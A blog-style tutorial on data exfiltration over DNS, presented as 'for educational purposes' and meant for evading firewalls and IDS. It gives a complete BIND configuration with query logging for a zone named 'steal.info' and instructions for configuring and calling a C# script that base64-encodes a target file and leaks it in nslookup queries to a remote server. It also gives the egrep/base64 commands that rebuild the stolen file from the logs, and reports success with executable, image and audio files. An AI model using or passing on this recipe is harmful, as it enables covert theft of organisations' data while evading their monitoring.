Data Exfiltration Over DNS

What is it?

 

Bad guys are using various methods to exfiltration data from organization or any target.basiclly they need to exfiltration data without being detected.most of organizations use firewalls and IDS to secure their network but allowing DNS(incoming/outgoing) 😀 so over the dns we can transfers files and other important stuff 😉 here i wrote a simple C# script to demonstrate the attack.For Educational Purposes Only

How does it work?

The idea is simple, the script will encode your data and split it into small parts and make nslookup requests to a remote server, then parse the logs on the remote server and decode the file.

Prerequisite

• Linux box with DNS a server
  • also you need to enable dns query logging 🙂
• DnsExfiltration Script

this is how my configatution files looks like

	cat named.conf
	include "/etc/bind/named.conf.options";
	include "/etc/bind/named.conf.local";
	include "/etc/bind/named.conf.default-zones";
	logging{
	channel querylog{
	file "/var/log/qrlog";
	print-category yes;
	print-time yes;
	};
	category queries{ querylog;};
	};
	cat db.steal.info
	$TTL 86400
	@ IN SOA steal.info. root.localhost. (
	1 ; Serial
	604800 ; Refresh
	86400 ; Retry
	2419200 ; Expire
	86400 ) ; Negative Cache TTL
	;
	@ IN NS localhost.
	IN A 10.0.0.1
	};
	cat named.conf.local
	zone "steal.info"{
	type master;
	file "/etc/bind/db.steal.info";
	};

view raw bindconfig hosted with ❤ by GitHub

Getting started

1. Download and edit DnsExfiltration Script
   1. static String Domain = “YOUR-DOMAIN-NAME”;  //add your bind domain
   2. static String NSserver = “YOUR-NAME-SERVER”;//add your dns server ip address
   3. Call ConvertInto64(string FileTosteal,string PathTosaveEncodedFile) function in main method
   4. call SendFile(string PathTosaveEncodedFile)
2. in linux box open terminal and run this command to Reassemble the file
   1. egrep -o “[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME” /var/log/qrlog | cut -d . -f1 | uniq | awk ‘!a[$0]++’ > /pathToSave/file.bin
   2. base64 -d file.bin > decoded.jpg
   3. Done!

Demo Video

i tested this script with following file types and its working 🙂

• jpg 1Mb
• mp3 3MB
• exe 1MB

Happy Hacking!

Reference

https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664